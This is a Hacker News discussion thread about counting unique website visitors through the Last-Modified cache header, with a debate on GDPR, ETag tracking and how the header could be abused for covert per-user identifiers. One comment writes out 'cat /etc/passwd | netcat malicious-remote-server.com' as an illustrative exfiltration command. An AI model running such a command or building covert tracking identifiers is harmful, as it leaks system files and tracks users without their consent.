[HN Gopher] Using a date-modified header to detect unique visito... ___________________________________________________________________ Using a date-modified header to detect unique visitors without using cookies Author : mulhoon Score : 306 points Date : 2022-11-30 16:04 UTC (6 hours ago) (HTM) web link (notes.normally.com) (TXT) w3m dump (notes.normally.com) | [deleted] | a_c wrote: | Looks like a nice middle ground between no tracking at all and | needing all tracking to how well your website perform. Seems no | fingerprinting is involved so the website visitor is anonymized. | Unlike cookies where we can store whatever we like, this method | reveal only the unique visit, and its derivatives. | alkonaut wrote: | I very much prefer this to e.g fingerprinting. This is local to | one site and basically uniqueness only rather than an identifying | id. I don't feel "tracked" or "targeted" by this. | schoen wrote: | Martin Pool discovered pretty much this technique back in 2000: | | https://catless.ncl.ac.uk/Risks/20.86.html#subj10.1 | kiriberty wrote: | Cringe moment, this is abusing the feature where last-modified | was created for | someweirdperson wrote: | "Counting unique visitors"? | | They are counting repeated requests. The unique count then is | "total requests" minus "repeated requests". | | Wouldn't it be easiser to count the number of times a cached | resource is accessed? | BeefWellington wrote: | Time of last access + a counter of your visits once your hits | reach N>2 is probably enough to separate an individual from the | crowd here, unless your site is tremendously busy. | jahewson wrote: | The fact that this is being used in an analytics product that | claims to be compliant with all privacy laws is horrifying. | There's no way this is compliant _and_ it's deceptive. | andix wrote: | I agree. Well crafted laws (like the GDPR) forbid any kind of | tracking without consent. It's the what and not the how. It | doesn't matter if it's via cookies or any other way. | pyrolistical wrote: | Please explain why this isn't compliant? | erdos4d wrote: | This is a form of data collection and tracking that is | definitely against GDPR unless the user is informed of it and | consents to it. As it stands, there is no such notification | or consent. IANAL but I strongly suspect will get you fined | in the EU. | pyrolistical wrote: | What personal information is being collected here? | erdos4d wrote: | GDPR doesn't just cover personal info, it also forbids | tracking without consent, which includes cookies and | other means. This is just a technical trick to track | someone sans cookie, so I'm 100% certain they will fine | anyone doing it unless they get consent. | whartung wrote: | Arguably this can become personally identifiable, much like a | persons height of 7 feet becomes personally identifiable. How | many 7 foot people live in Elko Nevada? (I have no idea, | perhaps there's an entire colony of them.) But most very tall | people, well, stand out. "You're that tall guy from Elko!" | | Early on, it's not personally identifiable. No doubt there | can be a lot of folks visiting the site only 10 times and | never again. | | But as someone continues to visit, they begin to narrow down | who they are to "You're that guy that comes in here every day | with a yellow hat". They may not "know" who you are but, they | "know" who you are. | | Eventually, there may be that one person that has the highest | hit rate, who always stands out. | jefftk wrote: | _> there may be that one person that has the highest hit | rate, who always stands out._ | | They could stop incrementing once they get to 10 (or | something that's high but common enough to be shared by | 1,000s of people). | Spivak wrote: | > You're that guy that comes in here every day with a | yellow hat | | Yes but you have absolutely nothing at all to associate | that back to a person. Where are you going to find the data | "personal information of some kind of the people who visit | your site a lot?" You're not collecting it. | bpfrh wrote: | Because the GDPR isn't about any specific technology, but | concerns any processing of personal data: | | https://gdpr.eu/what-is-gdpr/ | | Edit: Huh, I stand corrected I don't know if this would count | as personal data. | eurasiantiger wrote: | Storing a cache header is not an issue, but if it is used | as a unique identifier for user analytics purposes, it is | almost certainly personally identifying information, at | least after combining with other data. Since they are not | disclosing that they store something they use to ID users, | it is likely a GDPR violation, at least in spirit, and that | spirit is exactly what GDPR seeks to control. | bonestamp2 wrote: | > after combining with other data | | The post says that they don't combine datapoints because | that would negate privacy. | eurasiantiger wrote: | _They_ don't but anyone using their service could. | ATsch wrote: | It is personal data regardless of how it is used. The | only question is if that use of personal data is | permissive. | | Using it for user analytics, which is neither required to | run the service, nor in the users interest, nor | reasonably expected by the user, is almost definitly | illegitimate use. | jahewson wrote: | See my reply to b34r. In addition assigning users into | "anonymous" cohorts is a similar principle to FLoC which is | likely not GDPR compliant | https://searchengineland.com/googles-current-floc-tests- | aren... | tobr wrote: | That seems very different, as those cohorts are based on | actual personal data (correct me if I've misunderstood this | about FLoC). That's fundamentally different from a counter | I think. | jahewson wrote: | Yes that's right, FLoC is explicitly using personal data. | But now consider that that data is "you visited a | gardening website in the past month" and compare it with | "you visited this website 3 times yesterday" and the two | methods don't look so different. | tobr wrote: | I guess we all have different instincts when it comes to | this, but I find it much more expected and acceptable | that a website can see that I'm returning, than that they | get to know about random other interests I have based on | my general browsing history. | dahfizz wrote: | > Processing personal data to generate the cohort | assignment without the proper consent could also be a | violation | | Using personal data to assign a cohort counts as using | personal data. Duh. The approach described in the article | doesn't use any personal data, though? | eganist wrote: | > Using personal data to assign a cohort counts as using | personal data. Duh. The approach described in the article | doesn't use any personal data, though? | | Quoting the European commission: | | "Personal data is any information that relates to an | identified or identifiable living individual. Different | pieces of information, which collected together can lead | to the identification of a particular person, also | constitute personal data." | | I'd hazard a guess that it's the second part under which | the EC might find this to be within scope. | dahfizz wrote: | If I gave you a list of all the last-modified headers | from a day, how would you use that information to | identify a person? | ATsch wrote: | The definition of personal data under the GDPR is | anything that can be used to uniquely identify a natural | person (with sufficiently high probability). Both cookies | and date-modified meet that definition identically, as do | IP addresses. | | That doesn't mean you can't use it at all. It just places | strong restrictions on what purpodes you can use it for. | The important point is just that those restrictions are | the same under GDPR for all of these technologies. It | doesn't matter how you uniquely identify users, what | matters is what you do with that information. | dahfizz wrote: | They don't assign a unique date-modified to each user. | They assign _everyone_ the _same_ date modified on their | first visit of the day. I don 't accept that this could | be used to uniquely identify a natural person. | | You may be able to look at the headers and see that a | certain user made the most requests that day. That still | tells you nothing about their identity. | mytailorisrich wrote: | Nothing in the technique described here allows to | identify an individual directly or indirectly because | 'identifiers' are not unique and really no different than | standard 'last-modified' dates. Even if they were unique | further data would have to be collected in order to be | able to identify individuals and turn everything into | personal data. | | What the technique may fall foul of, though, are cookie | laws. | Spivak wrote: | You can't just scare quotes anonymous without explaining | how it could deanonymize you. You're sitting there with | full access to the count data they collect. Use any | statistical methods you like, figure out what visits were | me. | mytailorisrich wrote: | The article you quote does not suggest that "assigning | users into "anonymous" cohorts is ... is likely not GDPR | compliant" and I fail to see how that would be the case. | Rather it seems to mention concerns that _processing | personal data_ to do so may be problematic. | b34r wrote: | Why? It's anonymous and doesn't collect any user data other | than IP and stuff from the user agent | jahewson wrote: | It's not anonymous in a low-entropy situation. A user can be | indirectly identified. This would violate GDPR. | CaveTech wrote: | No it wouldn't. | jahewson wrote: | Yes it would because a unique time stamp allows me to | indirectly identify a user. | SparkyMcUnicorn wrote: | How? | kapep wrote: | It is not a unique timestamp though. Each day, all | visitors start at 00:00:00. All users that visit the site | a second time get the timestamp 00:00:01 and so on. | CaveTech wrote: | Where are people getting these insane reads of GDPR. Any | bit of entropy is not going to violate GDPR. First, an | active client-server connection is required for any kind | supposed "identity" contained here, which would of course | include far more unique bits of identity/entropy, such as | IP. Secondly, even if the full DB of page view counts | were leaked you could not actually use it to identify a | user. | | You have somehow perverted GDPR to believe it to mean `no | client may ever hold a unique state`. Good luck to anyone | making a claim that this is NOT possible in anything but | the most rudimentary application. | pyrolistical wrote: | I don't see how it can be used as described to identify an | individual person. | | Multiple requests end up with the same time stamp which | means individuals are not traceable but as an aggregate | countable | jahewson wrote: | Only multiple requests within a given second get the same | time stamp. So if you have less than 86k hits per day, | then all your time stamps could be unique. | | Edit: I misread the article here, where it said each | visit incremented the counter by one second. So my | calculation is not correct! | bradstewart wrote: | But how do I then tie that unique timestamp to an actual | _person_? Which is what GDPR is concerned about. | | (edit: spelling) | dahfizz wrote: | How do you go from timestamp to identifying someone? | | ~Every HTTP response has a Date field with a second- | resolution timestamp that might be unique. Are you | equally concerned about that? | TylerE wrote: | Birthday paradox means that will be far lower. | Thorrez wrote: | No, they are truncating the timestamp to the day. So all | visitors to the site on a specific day get the same | initial timestamp. | jahewson wrote: | Ah so they are, thanks! That's much better. Though for a | very, very low-traffic site this would still let me track | unique visitors. | genewitch wrote: | It is designed to track unique visitors, but not | differentiate between them at all. | | both you and i visit the same new site today, we both get | a file our browser caches with today's date at 00:00:01. | Tomorrow when we go to the same site, our browser says we | got the file yesterday, so the server sends a new | modified date to the browser, set to tomorrow's date at | 00:00:02. Both of us have the same "new" file with the | new modification date/time. | | if i go back the following day, the only thing the server | knows for certain, from just this header, is that i've | visited twice before. So i'm not counted as a unique | visitor. | | That this could be used by assigning a _unique_ timestamp | to each visitor is where everyone 's mind is going, and | it feels like half are annoyed there's another way to | leak information, and the other half are annoyed they | didn't think of it prior to the end-of-year marketing | bonus deadline. | [deleted] | prpl wrote: | Do people use etag for such purposes? | cpeterso wrote: | Yes. ETag tracking has been a thing for decades: | | https://en.wikipedia.org/wiki/HTTP_ETag#Tracking_using_ETags | habibur wrote: | This can be used like a cookie without using cookies as long as | definition of cookie stays "...a cookie is a small file stored on | your computer". | | You have 30 million seconds per year as unique identifier to be | used against each individual for tracking. Even though the OP | didn't do it. | | Put an expire time in between 10 years back to today and 300m | users tracked. | superjan wrote: | On the other hand, now that we know about it is easy to defeat: | a privacy conscious browser will just add a random amount of | minutes/seconds in the "if modified since" header. The only | risk is you sometimes trigger a reload because the resource was | modified in that interval. | Kuinox wrote: | It's harder, but you still leak bits of informations. If the | random function is known, statical analysis can still leak | out a bit of information. | [deleted] | legitster wrote: | Am I missing something? Abusing the cache meta-data to store data | on the user device seems much worse than a cookie. | | I would have serious doubts of the longevity of such a trick, let | alone some of the technical limitations I am sure the service | has. | bonestamp2 wrote: | The missing piece is that no fingerprint is involved. They | don't have a way of identifying that user, but they are still | able to count the number of times that visitor loads the page. | So, it's not a tracker, it's a counter. It's like a loyalty | punch card at your local sandwich shop -- they can track how | many times you've been there by counting the hole punches, but | they don't have a unique identifier, so they can't track | details about those visits. | | On the other hand, a cookie or a browser fingerprint contains | info that can uniquely identify that user so it can be used for | tracking. | legitster wrote: | A cookie doesn't _have_ to contain a fingerprint though. | | In the same way, nothing in their current method necessarily | says they couldn't find a way to insert a fingerprint here. | bonestamp2 wrote: | Fair enough. At least they've told us how it works, so if | the data no longer matches that methodology in the future | then we can speculate that they've implanted a UID, unless | they tell us how it works again and the data is consistent | with the new methodology. | o_m wrote: | Cookie tracking without consent is illegal in Europe, so it is | a clever way to still do some basic web analytics. | roelschroeven wrote: | Tracking without consent is illegal in Europe, _regardless of | the method_. Alternative tracking methods are not workarounds | to get around the law; they are only workarounds in trying | not to be caught. | atoav wrote: | Yeah nice try. Law makers are not _that_ stupid. _Any_ way of | storing personal data is subject to this regulation. | | And before you try the next thing, personal data is | everything that can be linked to a specific user, e.g. IP | addresses have been ruled to be personal data, some uuid that | helps you identify a user as well. | | People should really read the law, and/or at least literate | commentary on it instead of assuming things or repeating what | someone else assumed. | mytailorisrich wrote: | This is definitely not personal data. The piece of | information is not linked to an individual and cannot be | used to identify an individual (not the same as a 'user'), | not least because it is not unique to each visitor: | According to the article all first requests get the same | 'last-modified' date, same for all second requests, etc. | | Still, this stores data in the browser in a way that might | be deemed a technology similar to a cookie, and therefore | this might still fall within the various cookie laws, but | this is completely outside of personal data regs. | masklinn wrote: | Tracking without consent is illegal. This is a clever way to | get absolutely reamed, because you're not only in breach of | data protection laws you're actively trying to obfuscate it. | andix wrote: | The obfuscation part is probably irrelevant from a legal | perspective. | baggy_trough wrote: | This article is written like it's a great privacy breakthrough | but why is this any different from dropping a user id cookie? | jamincan wrote: | User's might block cookies, but this will likely still go | through. | jagged-chisel wrote: | How do you get more than 86,400 unique "identifiers" when they | only change every second? | marshray wrote: | A malicious site can put a different identifier on every | resource loaded by the browser. | | There really is no bottom, is there. | koliber wrote: | There are also many timezones and you can encode information | in the timezone indicator as well. Also, you can use | different days. You can stretch this number into millions. | For a website that gets a certain number of unique visitors | per year, this may be unique enough. | tedunangst wrote: | Subdomains. (Not sure why I immediately thought subdomains | and not just multiple resources.) | toast0 wrote: | who says Last-Modified has to be a current date? you've got | the potential for 1669827111 users as of when I was composing | this comment without giving your users future dates. | WirelessGigabit wrote: | You don't have to. A unique visitor is someone who comes in | without a last-modified header. Set the header, that person | is no longer unique. | nine_k wrote: | It is materially different because it does not track individual | users. | | It's comparable to dropping the same cookie to every visitor on | a particular day; a pretty low level of privacy invasion. | | Also, this allows to _not_ use such things as visitor 's IP | address to collect meaningful statistics, which is a privacy | win for the user, and an accuracy win for the site operator. | kevincox wrote: | Exactly this. It is different from dropping a user id cookie, | but equivalent to dropping a cookie hit_count=0, hit_count=1, | ... | baggy_trough wrote: | Seems like the hit_count cookie would be a lot more | straightforward. | ChoHag wrote: | politelemon wrote: | If the counter is empty for you, disable your adblocker | temporarily. The withcabin.com domain might be blocked. | dahfizz wrote: | Threads like this kinda make me sad about HN. Every single | comment is about how this technique might possibly be abused to | track users in very specific scenarios (i.e. you may be able to | identify your most active user). | | If a web server wanted to track you, they would just use your IP. | This is a clever technical trick to count your number of users | without collecting any personal data. I don't understand why that | is such a bad thing? | zackmorris wrote: | I think this cache date trick is clever! | | There are at least three fallacies with stuff like GDPR that | trigger anxiety in people by convincing them that they can | somehow safeguard their own privacy while surfing hundreds of | websites per day, many in other countries. I'm not going to | fully discredit them, just give counterexamples: | | 1) The internet can continue to work without tracking users | | - Targeted advertising (can't have both, although I can't say | that I'll miss ads) | | 2) Users care that companies have their personally identifiable | information (PII) | | - Users care how companies share and abuse their data for | profit (they already know they're being tracked if they don't | use something like TorBrowser) | | 3) Privacy protections actually result in privacy | | - PRISM and similar will always find you: | https://en.wikipedia.org/wiki/List_of_government_mass_survei... | | So I view all of this security theater with utter skepticism. I | think the only thing that can maybe save us is transparency. | Letting users download their data and using the threat of audit | to keep internet companies honest: | | https://securiti.ai/blog/dsar-rights-and-compliance/ | | The rest of the squabbling about "no that's PII, you can't save | that!" has only resulted in endless nagging and distraction. | It's like trying to hide your address from the post office or | thinking that your phone number is secret because it's not in | the phonebook. | | Although I do think it's kind of funny to make big companies | feel like they're living under a police state. They'll work | tirelessly to undermine these protections, which is why we'll | eventually abandon them like we did with prohibition and | McCarthyism because they just aren't enforceable when everyone | is breaking the law. Or (equally likely) they'll work to | bolster these laws to create new markets through power | imbalance, ensuring that only the largest companies can meet | compliance and smaller companies pay some sort of protection | money against the threat of litigation, which opens the door to | mass corruption. Both of these scenarios are ugly enough that I | think this entire rabbit hole is suspect. | Sohcahtoa82 wrote: | > If a web server wanted to track you, they would just use your | IP. | | I'd think a HN user would know that using an IP to track isn't | effective. | | For most home desktop users, at best, it tracks an individual | household, not a person. For corporate users and highly | privacy-conscious home users, it's probably completely | worthless as VPNs will make everyone come from a single IP. | | For mobile users, it's completely worthless. You'd be tracking | users of a specific WiFi network. If your phone is connecting | via IPv4, then who knows who you're tracking, as phones on a | mobile network will share an IP address. | ketralnis wrote: | And if you think VPN users are too obscure a use case to | account for, a specific case I've dealt with is (1) all of | AOL coming from one IP in Virginia (yes this was a while ago) | and (2) almost every university appearing as a single IP (on | a website frequented by university students) | jgalt212 wrote: | As recently as 2006, an entire country was behind a VPN | using a single public IP address. If lore can be | believed... | | https://superuser.com/questions/1013630/why-does-qatar- | use-a... | kccqzy wrote: | Universities do that now? When I was in college, if one | connects to the visitor network they'd give you a RFC1918 | address with NAT and a restrictive firewall, but if one | connects to the regular network and authenticates as a | student, they give you a publicly routable IP address. | jesprenj wrote: | Depends on a lot of factory. The primary school I was a | student at had public IPs at every computer, our national | academic and research network operators are encouraging | local network operators to avoid private IPs. But the | high school at which I'm currently a student, has private | IP addresses on every computer and a single external IPv4 | for the entire facility. It's not so one sided. | lazide wrote: | Many will also push http/https proxies regardless of IP | addressing schemes, so even if one user bypasses it, | anyone using defaults will come from whatever the | external proxy IP is. | ketralnis wrote: | I went to a community college that did transparent HTTP | proxying with not just deep packet inspection but caching | and "security"-oriented javascript injection. Headers | would get reordered, and its parser wasn't perfect so | multi-line headers would get broken sometimes. They'd | inject JS into pages to scan for... something? Other | injected JS? I have no idea. But it was impossible to | directly connect to another server without going through | their proxy even though from the TCP layer it looked like | you were. Lots of difficult to debug issues. | lazide wrote: | Wow, that's impressively evil. Right up there with the | old 'rewrite DNS traffic' trick from ISPs. | | Any idea what make/model the proxy was? | mike_d wrote: | At a previous job we tracked unique visitors to prevent ad | fraud. You'd find not only individual IPs with thousands of | users behind them, but also larger populations of users | numbering in the tens of thousands behind a small block of | 8-16 IPs. | | The craziest was a large multinational corporation that (I | guess for security?) changed their egress IP daily. The | first three octets remained the same and the fourth was | equal to the day of the month UTC. Really screws things up | when you use a 14 day rolling window of previous traffic | for comparisons. | bawolff wrote: | I mean, i expect most people who use a vpn to also use | incognito mode as well, which i assume would prevent this | type of tracking. | [deleted] | IshKebab wrote: | It's not a clever technical trick. It's a pointless technical | trick. | | You can do exactly the same thing with cookies and they are | better for privacy because there's an opt out mechanism. | They're how you're _supposed_ to do this sort of thing. | | Using a trick like this is no different to cookies in the eyes | of the GDPR. So the only reason to use this trick is if you | don't want to respect your users' privacy by being able to | block cookies. | EGreg wrote: | I mean, if people wanted to track visitors without cookies, | they'd just use etags... | | https://www.secjuice.com/etag-entity-tag-tracking/ | | Has Apple's ITP closed this particular loophole by ignoring | etags in third party iframes and capping them to 7 days etc. ? | | It seems browsers will want to restrict ALL first party cookies | to 7 days unless the visitor explicitly allows some domain to | store their identity. | | Frankly speaking, identity can be done better without cookies. | Look at Web3 sign-ins, we need something built into the browser | and seamless. For now maybe an extension. Then browser makers | can have a privacy mode that retires cookies, entirely. | | But how are you supposed to do caching without storing and | sending identifying data equivalent to cookies? | | Thoughts? | fanso99 wrote: | My understanding is that most commenters are less critical of | this specific implementation, but are alarmed by how this new | technique could be used by other more nefarious parties in the | future. | | Counting visits is probably still not a fully GDPR-complaint | use case, as the server stores data on the client's machine | which is indistinguishable from a cookie containing a counter. | tinus_hn wrote: | First, an IP address is considered personal data in the EU. | | Second, an IP address is not enough, it may change or be | shared. The advertisers 'need' to track you forever to serve | you relevant ads. So they devise all kinds of tricks to do so. | aardvarkr wrote: | > First, an IP address is considered personal data in the EU. | | I don't believe that's true. To my knowledge, GDPR only | treats IP address as personal data if it is associated with | actual identifying information (like name or address). | Collecting IP address alone, and not associating it with | anything else, is completely fine (otherwise nginx and | apache's default configs would violate GDPR), and through | them basically every website would violate GDPR. | fanso99 wrote: | Collecting IP addresses and linking them to a user ID is | considered PII as far as I know. | EGreg wrote: | So the idea is that you can't legally collect information | in private that you can technically collect. | | As long as a company is able to keep it a secret, they | won't get caught. | | Witness the hundreds of violations of public trust by | Facebook: | | https://www.independent.co.uk/tech/facebook-app- | recording-ca... | | The only complete solution is technological! | mytailorisrich wrote: | That's correct. IP addresses are not personal data in | themselves but they may become so if further data are | collected or accessible which allow to identify individuals | when used together with IP addresses. | rzzzt wrote: | CGNAT complicates matters even further. Sometimes I'm placed | way off within <country> if a site tries to go by GeoIP | databases, as the provider placed a bunch of households | behind a single address. | JohnFen wrote: | After decades of straight-up abuse by this sector of the | industry, including the subversion of countless "privacy | respecting" data collection techniques, I think an | extraordinary amount of skepticism and suspicion is more than | understandable. | kccqzy wrote: | Why would you put privacy respecting in quotes? The | subversion of those techniques are probably just because | those techniques are so new and people haven't had better | technologies yet. | | I personally consider those privacy respecting data | collection techniques as a parallel with the development and | use of cryptography on the web. In the beginning pretty much | no one online used cryptography; later on we started using | them but used weak ones ("export" cipher suites for example, | or just look at the issues in early protocols like SSL 2.0 or | SSL 3.0); nowadays almost everyone uses strong cryptography. | Similarly, in the beginning pretty much no one cared about | privacy when they did data collection; then we had begun to | care more about privacy, but many schemes are easily broken | due to for example misguided ideas of anonymization | ("anonymization by hashing"), and we are also starting to see | the development of newer private information retrieval | schemes and differential privacy, etc. Unlike the cynics on | this HN thread, I am quite confident that maybe a decade down | the road the majority of data collection done by companies | will be in a privacy preserving manner. Of course there will | be outliers much like there are still websites that don't use | https but those will be few and far between. | JohnFen wrote: | I quoted the term not with the intention of disparaging the | notion, but to indicate that I'm referring to a specific | class of approaches. That said, the term has also been | abused to the point where when it's used, I immediately | doubt that it's accurate. | mozman wrote: | Fingerprinting using WebRTC is far more effective. IPs are | useless. | nottorp wrote: | We tend to object to people considering it normal to track us. | Regardless of means. | dahfizz wrote: | This is not tracking. Could you explain why you think it is? | fanso99 wrote: | Storing a cookie with a counter still requires consent | afaik. If I am right, then this technique is not | sufficiently different and also requires consent. | robertlagrant wrote: | Why would that require consent? | chriswarbo wrote: | Consent is _always_ required; even if you just give | people a random UUID, with no associated session /etc., | that _always_ requires consent. | | There is a separate question, of whether consent is | implied. If the identifying information is required to | provide the user with a service they requested (e.g. a | cookie for their online shopping cart), then consent is | implied; no need to ask. | nottorp wrote: | Could you explain why i should care, considering the | current climate online? | | When you try to cram a list of 500 "legitimate interests" | down my throat, I will consider no interest as legitimate. | | No matter what your goals are, you're in an industry that | has zero trust these days. | dahfizz wrote: | Without viable alternatives, sites will continue to use | Google Analytics. If people like you fear-monger every | alternative, sites will continue to use Google Analytics. | | The method described in the article collects no personal | data, collects no identifiable data, and is objectively | more user-respecting than Google Analytics. But the | behavior by people like you will help make sure that | these alternatives don't gain traction and Google | maintains their monopoly. | EGreg wrote: | Not only that. The ability to track your own visitors is | BUILT INTO how the web operates. | | All a site has to do is include analytics in its server- | side library. And that's it. Doesnt even need CNAME | cloaking. It can send the analytics anywhere. | | The thing ITP and others try to stop is tracking users | ACROSS sites. | | But if you use single-sign-on with FB or any other | service, they can get your public photo, name and just | find you on faceboon thru some search engine that | spidered all profiles. | | So if you really want to be anonymous, stop using the | single sign on and reusing passwords etc. | ohbtvz wrote: | But google analytics isn't viable. It's illegal to use in | the EU. Here's an explanation by, well, a viable | alternative to google analytics: | https://matomo.org/blog/2022/05/google-analytics-4-gdpr/ | | (I don't have a horse in this battle - my personal | website doesn't have analytics at all.) | stalfosknight wrote: | How about we just _stop_ tracking users and hoovering up | private data? | xapata wrote: | Who's "we"? I don't mind it. I want advertisers to give me | more relevant advertising. | mschuster91 wrote: | I don't want _any_ unsolicited advertising - and I wish our | societies would decide to outright _ban_ advertising: | Outdoor advertising is a nuisance for the eyes, radio and | TV advertising is annoying AF (particularly as it tends to | be mixed at a much greater loudness than the program | running, my conspiracy theory is that this is done so | people are forced to hear it when they go to the loo), | paper advertising (e.g. in newspapers, flyers or postal | spam) is a waste of paper and online advertising is an | insane danger for privacy and a vector for distribution of | malware. | | Ideally, we'd have independent consumer protection | entities, either government or private (e.g. German | Stiftung Warentest), that would get products from companies | to rank and test, so consumers could make actually informed | decisions instead of being lured by hyped up advertising | claims. | dspillett wrote: | Depends how you define relevant. Since actively trying to | block stalky advertising behaviours I've had more | interesting adverts (by "interesting" I mean new-to-me, not | the "do you want another one of the thing you've already | bought all you need of for a while" types). Things are | relevant enough if, for instance, I get running related | adverts while reading an article about other runners or | browsing shoes. | | In my experience the stalky behaviour doesn't improve the | advertising relevance from my PoV, so the fact it means | that all that derived information, some of it definitely | PII, is out there so should anyone be able to hack into it | they could use it for fraudulent purposes (identity theft, | spear-fishing my contacts, ...), makes the situation lose- | lose for me. | | It is worse for other people, as they have information that | advertisers like to derive that might be extra sensitive. | Being white, male, cis, middle-class, ete, with a life not | interesting enough for there to be much to convincingly | blackmail or threaten me about, living in western Europe, | I'm pretty safe, but this can't be said for others | especially in certain parts of the world (scarily religious | ruled countries with bad records on individual rights, like | Qatar and America to give two examples). | xapata wrote: | I think you're conflating two different kinds of | surveillance. The article is incrementing a counter to | track the number of unique visitors. | | If one is worried about blackmail or violence, especially | from a government, then one should take precautions | beyond complaining about the prevalence of browser | cookies. Modern life, carrying a mobile internet device | with GPS service, using a credit card, and going to | places with security cameras, presents a variety of | surveillance methods. | throwaway0x7E6 wrote: | we the normal people | lolinder wrote: | Counting is not the same as tracking. The technique proposed | would in most cases be useless for trying to _distinguish_ | individuals, much less identify them. It 's the computer | equivalent of the person standing out in front of Costco with | a clicker counter. | MereInterest wrote: | In principle, screen resolution would in most cases be | useless for trying to distinguish individuals. After all, | it wouldn't even distinguish the underlying hardware, let | alone a user of that hardware. But given omnipresent | tracking, it's one more bit that can be used to identify | you. | | In addition, your comment shows a severe lack of | imagination. Suppose I'm a malicious server who wishes to | track users. | | * For each new user, select a random "late-modified" date. | Now, I can clearly distinguish between multiple different | users, because "1985-01-01T00:00:10" is probably the 10th | visit from whoever was given "1985-01-01T00:00:00" on their | first visit. | | * If I have too many users for the above approach to | uniquely identify a person, add more cached items. With | HTTP/2, both HTTP requests would use the same TCP | connection, so I can correlate the requests together. | | And, bam. That goes from "useless for trying to distinguish | individuals, much less identify them" to a unique | identifier stored in the cache invalidation dates. | lolinder wrote: | That is a different technique that uses the same medium | of storage. When I say "this technique" I'm referring to | specifically what was discussed in the article. | | "Evil tracking companies will do evil things with any | protocol features you give them" is already well known | and there's not much to say about it that hasn't been | said. What OP is _actually_ doing is clever and new to | me. | MereInterest wrote: | I agree that it is clever, and it is new to me as well. | However, saying that an obvious extension to a technique | (posted by multiple people independently, no less) is a | different technique altogether and therefore not germane | is going a bit far. | | If I post a privilege escalation exploit that allows me | to execute "cat /etc/sudoers", and somebody points out | that it could also be used to execute "cat /etc/passwd | | netcat malicious-remote-server.com", that's an obvious | extension of the same technique. This is the same, where | the same technique may be used for more intrusive attacks | than are performed in the initial proof of concept. | lolinder wrote: | This kind of attack isn't new, though, trackers have been | using side channel tracking forever now. A quick search | shows that this _exact_ side channel tracking | vulnerability was discussed in the year 2000 [0]. | | I'm not saying the technique isn't similar: I just object | to people dogpiling on OP because _other_ people can and | do abuse the same header in nefarious ways. It 's not | constructive, just a pointless attack on someone who's | actually trying to improve privacy. | | [0] http://www.sourcefrog.net/projects/meantime | ilyt wrote: | Kinda need one for the other if you want to distinguish | different users vs just one user clicking a lot. | | You need some kind of identifier to differentiate between | different sessions, and the moment you generate that ID, | using whatever way, you are tracking user. | bawolff wrote: | Why would it be useless? Just pick a random date for each | user. | lolinder wrote: | I'm not talking about what you could theoretically do | with cache headers, I'm talking about what the author of | the article is actually doing. | bawolff wrote: | Its not like that is a far walk though. Its the exact | same technique, just storing different data. | | Respectfully i feel like this would be like seeing an | example of css turning a page blue and claiming the | technique is useless for turning the page red because | that is not the specific example used. | lolinder wrote: | If a bunch of people got up in arms and started | complaining because the author of said CSS example hadn't | considered that their code could be changed slightly to | produce a hate symbol, I'd definitely still jump in and | say "but that's not what they were doing!" | SkyBelow wrote: | Counting is not tracking, but counting unique visitors | requires tracking to know they are unique. If the person | outside of Costco is counting unique visitors, they must be | tracking who has already visited and who has not. Even if | they aren't doing anything else with that information and | forgetting it each night, it is tracking. The existing | abuse of tracking has led to a level of backlash where any | tracking is seen through the worst possible lens. | jcuenod wrote: | It doesn't require tracking. Tracking would mean I could | tell that user x has returned n times. But I have no idea | who has returned, only that someone has returned n times. | | The person standing outside Costco is counting people by | giving them a colored sticker when they walk through the | door. If they show up already having one, the counter | issues a different color. Who has the stickers is | unknown; only the number of stickers distributed in each | color is known. | | As has been said, this is not to say the technique | couldn't be used for nefarious purposes. In this case, | it's not, though. | SkyBelow wrote: | That's still a form of tracking. Maybe not enough to | identify unique users in some use cases, but even just | knowing someone has been here n times is enough if the | user numbers are low enough that you can identify users | by unique n counts and patterns of n (such as if one user | is at 500 and another is at 490, if the second one is | logging in daily while the first one hasn't logged in for | a few months, and you see the 490 go 491, 492... when | they go from 499 to 500, the chance when a 500 logs on | tomorrow and becomes 501 it was the 490 account that has | been logging in daily). | jcuenod wrote: | Must admit, I've never thought of "number of times I've | visited your site" as PII. Number of times I've visited | every site in my browser history, maybe, but not "number | of times I've visited this specific site". I'm thinking | about it, but I'm not immediately convinced. | [deleted] | layer8 wrote: | If this becomes widespread, browers will probably start fudging | the timestamps. | glenjamin wrote: | I think the comments on this post would probably less hostile if | the title said something like "detect the number of unique | visitors", which is what I believe it's doing, rather than | detecting unique visitors using unique timestamps, which is what | many seem to be guessing based on the headline alone. | andix wrote: | It would be interesting if it is also possible to abuse it. If | it is possible to create enough unique timestamps, that | browsers still accept them. Can you add milliseconds to the TS, | and do browsers store them too? Or do browsers also accept | timestamps from months or years back and re-send them? If you | can use the whole scale of Unix time (int32), there is a huge | pool of entropy available. | | In this case they don't do this evil thing, and it probably | would still violate the European GDPR, even if it's not an | actual cookie, but somebody has to find it first. | kapep wrote: | Even without millisecond precision, you could embed multiple | assets that are served with slightly different timestamps to | encode a unique identifier. | tedunangst wrote: | Your personal visit count is embedded in the seconds. | lisper wrote: | Yes, but not your identity. | michaelbuckbee wrote: | They're using this to track number of unique visits from a | single user to a site. | Thorrez wrote: | Yes, but I think they're not tracking anything else about the | user besides number of visits. E.g. they're not tracking ip I | don't think. | | And I think they are only doing it within a single day, not | across days. | | If you know that someone exists who visited your site 500 | times today, but know nothing else about the person, is that | a privacy problem? | rkagerer wrote: | ...at the cost of caching (or at least a round trip). | | Is it necessary to know how many visits per day a particular user | made? If # of unique visitors per day/week/whatever is | sufficiently granular you could retain a corresponding cache | window. | | Also if this is to avoid those cookie warnings that got popular | after GDPR, it should be noted you're still storing information | on users' computers. i.e. The stuffed metadata is not so | different in principle from a cookie. In this case it seems | innocuous, but I wouldn't be surprised to see sites exploit your | trick to store a unique last-modified date for each user as a | method of tracking (if that's not already commonplace). | not2b wrote: | The number of unique visits in a day is the number of total | visits minus the number of repeat visits from the same users, | so they need something like this to get an accurate count. You | can't produce the number without information on repeat | visitors. | | I think you are right that this technique could be changed and | turned into a way to track individual users. But as | implemented, it doesn't do that, and all knowledge is lost | after one day. We shouldn't criticize people who are trying to | limit the information they collect to the bare minimum by | pointing out an altered version of their system might have | undesirable properties. | rkagerer wrote: | Then the server doesn't need to know about repeat-visits that | don't hit it, and it would be nice to maintain caching | support if the page content is static. | irq-1 wrote: | Change 'last-modified' to use a secure hash of the contents, like | sha256. Then the browser can detect if a website is giving bad | hashes, potentially using them for tracking. | sdfhbdf wrote: | Thats what ETag is for. | | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET... | irq-1 wrote: | ETags can be anything -- they aren't required 